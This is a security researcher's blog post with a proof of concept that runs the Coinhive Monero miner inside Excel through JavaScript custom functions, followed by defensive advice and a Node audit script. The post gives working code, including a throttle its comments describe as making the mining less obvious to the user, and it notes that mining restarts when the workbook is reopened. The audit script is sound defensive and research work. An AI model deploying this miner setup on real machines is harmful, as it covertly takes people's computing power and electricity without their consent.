Charles Dardaman

Security engineering, incident response, research.

JavaScript Coinhive in Excel

Timeline

This morning, I read that Microsoft announced that they have added JavaScript custom functions to the Insider preview build of Excel.

https://www.bleepingcomputer.com/news/microsoft/microsoft-adds-support-for-javascript-functions-in-excel/

Like most of you reading this, I couldn't wait for a proof of concept of coin mining within Excel using the new JavaScript functions.

I even went as far as to offer a small bounty to anyone at Dallas Hackers who could build and present on it at next month's meetup.

After making this offer, I started to read Microsoft's actual documentation on how to implement JavaScript within Excel, and decided I could do this myself. I then signed up for an account on coinhive.com and started to download the preview build of Excel for macOS. After over an hour of downloading the preview on my 5 Mbps internet, I was able to get my hands on it and get Coinhive running within the newest preview build of Excel.

Proof of Concept

In order to run Coinhive in Excel, I followed Microsoft's official documentation and just added my own function. There are three steps that Microsoft lists in order to get JavaScript running:

  1. Install Office (build 9325 on Windows or 13.329 on Mac) and join the Office Insider program. (Note that it isn't enough just to get the latest build; the feature will be disabled on any build until you join the Insider program.)
  2. Clone the Excel-Custom-Functions repo and follow the instructions in the README.md to start the add-in in Excel, make changes in the code, and debug.
  3. Type =CONTOSO.ADD42(1,2) into any cell, and press Enter to run the custom function.

Microsoft's documentation covers the steps in detail. The first step is easy: select the Insider program from the update menu for Microsoft Office and allow it to update. This gives Excel the ability to run JavaScript functions.

Screenshot showing Excel Insider build update screen

Step two is where the magic happens. Head to Microsoft's GitHub (the Excel-Custom-Functions repo) and download the four important files: the HTML page, the JavaScript file, the JSON metadata file, and the XML manifest.

Once you have these files, you need to make a couple of edits to add the Coinhive code from Coinhive's own documentation. In the HTML file, add the following script tag to the head so that the Coinhive library is loaded and can be called later:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>

In the JavaScript file, add the following function, which will be called from within the Excel cell. The key and throttle come straight from Coinhive's documentation; the two guards are Coinhive's own API and skip mining on mobile browsers or where the user has opted out within the last 14400 seconds:

function MINER(){
    // Anonymous miner keyed to your Coinhive site key; throttle 0.7 idles the
    // CPU 70% of the time so the mining is less obvious to the user.
    var miner = new CoinHive.Anonymous('Your Public Coinhive Key goes here.', {throttle: 0.7});

    // Coinhive's own checks: don't run on mobile, and honour a recent opt-out.
    if (!miner.isMobile() && !miner.didOptOut(14400)) {
        miner.start();
    }

    // The JSON metadata declares a scalar number result, so return one for the cell.
    return 0;
}

In the JSON file, add the following entry to the "functions" array so that Excel knows about the new MINER function and how to display it:

{
    "name": "MINER",
    "description": "MINER MINER",
    "helpUrl": "http://dev.office.com",
    "result": {
        "type": "number",
        "dimensionality": "scalar"
    },
    "parameters": [],
    "options": {
        "sync": false
    }
}

After editing these three files, you must host them on a web server. I hosted them on a Linux VM running Apache so that I could easily hit the files locally.

Lastly, edit the XML file by adding in the web server IP address.

<SourceLocation DefaultValue="http://192.168.201.140/customfunctions.html"/>
...
<bt:Urls>
    <bt:Url id="JSON-URL" DefaultValue="http://192.168.201.140/customfunctions.json" />
    <bt:Url id="JS-URL" DefaultValue="http://192.168.201.140/customfunctions.js" />
    <bt:Url id="HTML-URL" DefaultValue="http://192.168.201.140/customfunctions.html" />
</bt:Urls>

This XML file is the manifest file that must currently be added into Excel for JavaScript to work. I assume this will change by the time JavaScript becomes fully supported in Excel, as most users will not be savvy enough to add in the functionality themselves. On macOS, I followed instructions on Microsoft's blog, which basically tell you to copy the XML file into the following location:

/Users/<username>/Library/Containers/com.microsoft.Excel/Data/documents/wef/

With all of these files in place and hosted, you're ready for step three. Open a new workbook in Excel and click Insert → My Add-ins; you should now see that your new functions have been added.

Excel custom function add-in showing new functions

Now, simply type the following into any cell on the sheet and hit enter:

=CONTOSO.MINER()

Your PC will now be mining Monero for you. This code does have persistence: if you save the XLSX sheet now and reopen it, your PC will instantly start to mine again without any user interaction. Note that what persists is the formula in the cell plus the sideloaded manifest in the wef folder; the workbook itself does not carry the add-in, so a copy opened on a machine where the manifest has not been installed will not mine.

Summary

Microsoft has, for some reason, decided that the business world needs yet another scripting language running within Office. Currently, it takes some effort to get JavaScript running within Excel, but I suspect that the difficulty will drop drastically as we near full support. Once that happens, I plan to take another look at this new attack vector.

If you are a blue-teamer, like me, wondering how to defend against such an attack, get in front of your IT team and have JavaScript custom functions disabled as soon as they hit the full Office build. We do not yet know what controls Microsoft will put around JavaScript use, but it will probably be easier to block it before your company becomes dependent on it.
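Until Microsoft ships a control, the artifacts this PoC leaves behind are the sideloaded manifest in the wef folder and the HTML/JS it points at, and both can be audited. The following is an added example, not code from the original post or from Microsoft: a small Node script that pulls every URL out of a manifest, flags add-in code served over plain HTTP or from a raw IP, and scans the fetched HTML and JS for the Coinhive library and the CoinHive global. The sample manifest, HTML and JS are constructed inline from the fragments above so it runs offline; in practice you would read the manifests from the wef directory and fetch the URLs they reference. The indicator lists contain only what appears in this post and would need extending for real use.

```javascript
"use strict";

// Constructed sample inputs, modelled on the fragments shown in the post.
// Real input: manifest files from
// ~/Library/Containers/com.microsoft.Excel/Data/documents/wef/ and the
// HTML/JS fetched from the hosts those manifests reference.
const SAMPLE_MANIFEST = `<OfficeApp>
  <SourceLocation DefaultValue="http://192.168.201.140/customfunctions.html"/>
  <bt:Urls>
    <bt:Url id="JSON-URL" DefaultValue="http://192.168.201.140/customfunctions.json" />
    <bt:Url id="JS-URL" DefaultValue="http://192.168.201.140/customfunctions.js" />
    <bt:Url id="HTML-URL" DefaultValue="http://192.168.201.140/customfunctions.html" />
  </bt:Urls>
</OfficeApp>`;

const SAMPLE_HTML = `<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
</head><body></body></html>`;

const SAMPLE_JS = `function MINER(){
    var miner = new CoinHive.Anonymous('KEY', {throttle: 0.7});
    if (!miner.isMobile() && !miner.didOptOut(14400)) { miner.start(); }
}`;

// Indicators of browser cryptomining. Only coinhive.com and the CoinHive
// global appear in the post; a production list would be longer (assumption).
const MINER_HOSTS = ["coinhive.com"];
const MINER_GLOBALS = ["CoinHive"];

// Every DefaultValue attribute in the manifest is a URL Excel will load
// (SourceLocation plus the bt:Url entries). A regex is enough here because
// these are single self-closing elements.
function extractManifestUrls(xml) {
  const urls = [];
  const re = /DefaultValue="([^"]+)"/g;
  let m;
  while ((m = re.exec(xml)) !== null) urls.push(m[1]);
  return urls;
}

function isIpLiteral(host) {
  return /^\d{1,3}(\.\d{1,3}){3}$/.test(host);
}

// Add-in code over plain HTTP can be swapped by anyone on the path, and a
// raw IP host is how a sideloaded PoC like this one looks.
function auditManifest(xml) {
  const urls = extractManifestUrls(xml);
  const findings = [];
  for (const u of urls) {
    let parsed;
    try {
      parsed = new URL(u);
    } catch (e) {
      findings.push({ kind: "unparseable-url", detail: u });
      continue;
    }
    if (parsed.protocol !== "https:") findings.push({ kind: "plain-http", detail: u });
    if (isIpLiteral(parsed.hostname)) findings.push({ kind: "ip-literal-host", detail: u });
  }
  return { urls, findings };
}

// Scan the fetched HTML for miner library loads and the JS for miner API use.
function auditAddinSource(html, js) {
  const findings = [];
  const srcRe = /<script[^>]*\ssrc=["']([^"']+)["']/gi;
  let m;
  while ((m = srcRe.exec(html)) !== null) {
    let host = "";
    try { host = new URL(m[1]).hostname; } catch (e) { host = ""; }
    if (MINER_HOSTS.some(h => host === h || host.endsWith("." + h))) {
      findings.push({ kind: "miner-library", detail: m[1] });
    }
  }
  for (const g of MINER_GLOBALS) {
    if (new RegExp("\\b" + g + "\\b").test(js)) findings.push({ kind: "miner-global", detail: g });
  }
  return findings;
}

// One report per add-in: all URLs the manifest will load plus every finding.
function auditAddin({ manifest, html, js }) {
  const m = auditManifest(manifest);
  return { urls: m.urls, findings: m.findings.concat(auditAddinSource(html, js)) };
}

const report = auditAddin({ manifest: SAMPLE_MANIFEST, html: SAMPLE_HTML, js: SAMPLE_JS });
for (const f of report.findings) console.log(`${f.kind}: ${f.detail}`);
```

Run against the sample above it reports plain-http and ip-literal-host for all four manifest URLs, the coinhive.min.js script load, and the CoinHive global in the JS. Every host name in a manifest is also a candidate for an egress block or a proxy alert, which is a cheaper control than waiting for a CPU spike.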

If you have any questions regarding this proof of concept please reach out on Twitter. I'm happy to answer questions.